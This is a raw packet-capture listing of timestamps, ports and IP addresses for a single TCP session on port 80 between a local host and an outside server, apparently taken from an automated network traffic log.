Oct 2, 2024 18:19:26.559200048 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.559201002 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.559227943 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.559252024 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.559479952 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.559503078 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.559516907 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.559520960 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.559531927 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.559542894 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.559554100 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.559554100 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.559571028 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.559571028 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.559586048 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.559597015 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.559600115 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.559612989 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.559614897 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.559629917 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.559634924 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.559644938 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.559659958 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.559669018 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.559674025 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.559689045 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.559698105 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.559704065 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.559717894 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.559720039 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.559737921 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.559771061 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.560178995 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.560193062 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.560208082 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.560216904 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.560221910 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.560233116 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.560236931 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.560251951 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.560254097 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.560269117 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.560278893 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.560282946 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.560291052 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.560297966 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.560305119 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.560306072 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.560312986 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.560319901 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.560401917 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.567179918 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.567205906 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.567222118 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.567240000 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.688918114 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.688935995 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.688951015 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.689032078 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.689064026 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.689069033 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.689084053 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.689097881 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.689111948 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.689131021 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.689145088 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.689150095 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.689165115 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.689188004 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.689209938 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.689224005 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.689225912 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.689238071 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.689246893 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.689253092 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.689263105 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.689270020 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.689280033 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.689284086 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.689299107 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.689301014 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.689346075 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.689543009 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.689567089 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.689582109 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.689591885 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.689598083 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.689611912 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.689616919 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.689629078 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.689634085 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.689647913 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.689651012 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.689662933 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.689673901 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.689677954 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.689691067 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.689692974 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.689706087 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.689707041 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.689722061 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.689723015 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.689737082 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.689738989 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.689754009 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.689754963 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.689774990 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.689796925 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.690169096 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.690184116 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.690197945 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.690212965 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.690218925 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.690227985 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.690243006 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.690243959 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.690264940 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.690285921 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.690323114 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.690336943 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.690351963 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.690367937 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.690368891 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.690392017 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.690416098 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.690445900 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.690459967 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.690473080 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.690486908 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.690489054 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.690501928 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.690505028 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.690515995 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.690521002 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.690535069 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.690537930 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.690551043 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.690551996 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.690567970 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.690581083 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.690583944 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.690599918 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.690604925 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.690625906 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.690638065 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.690998077 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.691011906 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.691025972 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.691040039 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.691052914 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.691056013 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.691077948 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.691081047 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.691093922 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.691096067 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.691108942 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.691122055 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.691124916 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.691140890 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.691165924 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.691375971 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.691407919 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.691422939 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.691422939 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.691437960 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.691450119 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.691452026 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.691467047 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.691469908 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.691481113 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.691494942 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.691495895 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.691514015 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.691521883 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.691540956 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.691541910 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.691556931 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.691561937 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.691571951 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.691579103 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.691586971 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.691593885 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.691601038 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.691616058 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.691618919 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.691629887 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.691633940 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.691643953 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.691657066 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.691668034 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.691684008 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.691687107 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.691696882 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.691716909 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.691716909 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.691731930 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.691734076 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.691757917 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.691780090 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.692384958 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.692399025 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.692421913 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.692435980 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.692439079 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.692450047 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.692465067 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.692466021 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.692478895 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.692488909 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.692493916 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.692513943 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.692517042 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.692528963 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.692533970 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.692543983 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.692559004 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.692559004 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.692574024 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.692588091 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.692589998 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.692601919 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.692615986 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.692625046 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.692640066 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.692645073 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.692656040 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.692660093 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.692673922 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.692682028 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.692689896 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.692699909 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.692703962 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.692717075 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.692718983 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.692734003 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.692735910 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.692755938 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.692776918 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.693272114 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.693285942 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.693300962 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.693315029 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.693315983 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.693329096 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.693331957 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.693344116 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.693347931 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.693356037 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.693370104 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.693372965 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.693386078 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.693397999 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.693399906 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.693414927 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.693418026 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.693428993 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.693439960 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.693444967 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.693456888 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.693469048 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.693495989 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.780694962 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.780719995 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.780735970 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.780795097 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.780833006 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.780838966 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.780848026 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.780864000 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.780879974 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.780898094 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.780930996 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.780968904 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.781052113 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.781066895 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.781081915 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.781095982 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.781102896 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.781111002 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.781131983 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.781147003 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.781208038 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.781229019 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.781243086 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.781254053 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.781258106 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.781269073 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.781272888 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.781284094 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.781287909 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.781303883 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.781321049 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.781531096 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.781544924 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.781559944 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.781574011 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.781575918 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.781589031 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.781591892 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.781605959 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.781618118 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.781637907 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.781651020 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.781682968 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.781697989 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.781728983 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.781785011 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.781799078 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.781812906 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.781819105 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.781826973 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.781841993 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.781855106 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.781858921 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.781873941 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.781891108 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.782046080 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.782059908 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.782075882 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.782089949 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.782102108 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.782104969 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.782119989 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.782130957 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.782135010 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.782146931 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.782150984 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.782253027 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.782253027 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.782318115 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.782332897 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.782347918 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.782363892 CEST	80	49737	185.215.113.37	192.168.2.4
